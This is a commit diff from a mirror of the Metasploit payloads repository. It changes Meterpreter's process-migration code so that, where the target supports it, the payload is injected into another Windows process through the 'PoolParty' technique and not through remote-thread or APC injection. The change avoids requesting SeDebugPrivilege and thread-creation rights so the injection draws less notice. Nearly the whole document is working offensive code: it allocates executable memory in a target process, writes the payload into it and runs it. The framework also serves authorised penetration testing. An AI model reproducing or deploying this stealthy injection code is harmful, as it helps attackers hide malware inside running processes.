github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

feat(injection): update base_dispatch to use inject_via_poolparty when possible

Browse Source
This commit is contained in:
dledda-r7 2024-08-01 05:18:31 -04:00
parent 7f66532422
commit 25ee5deddf
No known key found for this signature in database
GPG Key ID: 4D4EC504A1F02FFF
1 changed files with 42 additions and 26 deletions

68
c/meterpreter/source/metsrv/base_dispatch.c

@ -540,6 +540,8 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
MetsrvConfig* config = NULL; MetsrvConfig* config = NULL;
DWORD configSize = 0; DWORD configSize = 0;
BOOL bStealth = FALSE;
DWORD dwProcessAccess;
do do
{ {
response = packet_create_response(packet); response = packet_create_response(packet);
@ -568,27 +570,34 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
dprintf("[MIGRATE] Attempting to migrate. ProcessID=%d, Arch=%s", dwProcessID, dwDestinationArch == 2 ? "x64" : "x86"); dprintf("[MIGRATE] Attempting to migrate. ProcessID=%d, Arch=%s", dwProcessID, dwDestinationArch == 2 ? "x64" : "x86");
dprintf("[MIGRATE] Attempting to migrate. PayloadLength=%d StubLength=%d", dwPayloadLength, dwMigrateStubLength); dprintf("[MIGRATE] Attempting to migrate. PayloadLength=%d StubLength=%d", dwPayloadLength, dwMigrateStubLength);
// If we can, get SeDebugPrivilege... bStealth = support_stealth_injection(dwDestinationArch);
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
TOKEN_PRIVILEGES priv = { 0 };
priv.PrivilegeCount = 1; if(!bStealth) {
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
{ {
if (AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL)) TOKEN_PRIVILEGES priv = { 0 };
{
dprintf("[MIGRATE] Got SeDebugPrivilege!");
}
}
CloseHandle(hToken); priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
{
if (AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL))
{
dprintf("[MIGRATE] Got SeDebugPrivilege!");
}
}
CloseHandle(hToken);
}
}
dwProcessAccess = PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ;
if (!bStealth) {
dwProcessAccess |= PROCESS_CREATE_THREAD;
} }
// Open the process so that we can migrate into it hProcess = OpenProcess(dwProcessAccess, FALSE, dwProcessID);
hProcess = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcessID);
if (!hProcess) if (!hProcess)
{ {
BREAK_ON_ERROR("[MIGRATE] OpenProcess failed") BREAK_ON_ERROR("[MIGRATE] OpenProcess failed")
@ -630,6 +639,7 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
dprintf("[MIGRATE] Duplicated Event Handle: 0x%x", (UINT_PTR)ctx->e.hEvent); dprintf("[MIGRATE] Duplicated Event Handle: 0x%x", (UINT_PTR)ctx->e.hEvent);
// Allocate memory for the migrate stub, context, payload and configuration block // Allocate memory for the migrate stub, context, payload and configuration block
lpMemory = (LPBYTE)VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + ctxSize + dwPayloadLength + configSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); lpMemory = (LPBYTE)VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + ctxSize + dwPayloadLength + configSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!lpMemory) if (!lpMemory)
@ -639,7 +649,6 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
// Calculate the address of the payload... // Calculate the address of the payload...
ctx->p.lpPayload = lpMemory + dwMigrateStubLength + ctxSize; ctx->p.lpPayload = lpMemory + dwMigrateStubLength + ctxSize;
// Write the migrate stub to memory... // Write the migrate stub to memory...
dprintf("[MIGRATE] Migrate stub: 0x%p -> %u bytes", lpMemory, dwMigrateStubLength); dprintf("[MIGRATE] Migrate stub: 0x%p -> %u bytes", lpMemory, dwMigrateStubLength);
if (!WriteProcessMemory(hProcess, lpMemory, lpMigrateStub, dwMigrateStubLength, NULL)) if (!WriteProcessMemory(hProcess, lpMemory, lpMigrateStub, dwMigrateStubLength, NULL))
@ -670,18 +679,25 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
free(ctx); free(ctx);
// First we try to migrate by directly creating a remote thread in the target process if (!bStealth) {
if (inject_via_remotethread(remote, response, hProcess, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS) // First we try to migrate by directly creating a remote thread in the target process
{ if (inject_via_remotethread(remote, response, hProcess, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
dprintf("[MIGRATE] inject_via_remotethread failed, trying inject_via_apcthread...");
// If that fails we can try to migrate via a queued APC in the target process
if (inject_via_apcthread(remote, response, hProcess, dwProcessID, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
{ {
BREAK_ON_ERROR("[MIGRATE] inject_via_apcthread failed"); dprintf("[MIGRATE] inject_via_remotethread failed, trying inject_via_apcthread...");
// If that fails we can try to migrate via a queued APC in the target process
if (inject_via_apcthread(remote, response, hProcess, dwProcessID, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
{
BREAK_ON_ERROR("[MIGRATE] inject_via_apcthread failed");
}
}
}
else {
if (inject_via_poolparty(remote, response, hProcess, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
{
BREAK_ON_ERROR("[MIGRATE] inject_via_poolparty failed");
} }
} }
dwResult = ERROR_SUCCESS; dwResult = ERROR_SUCCESS;
} while (0); } while (0);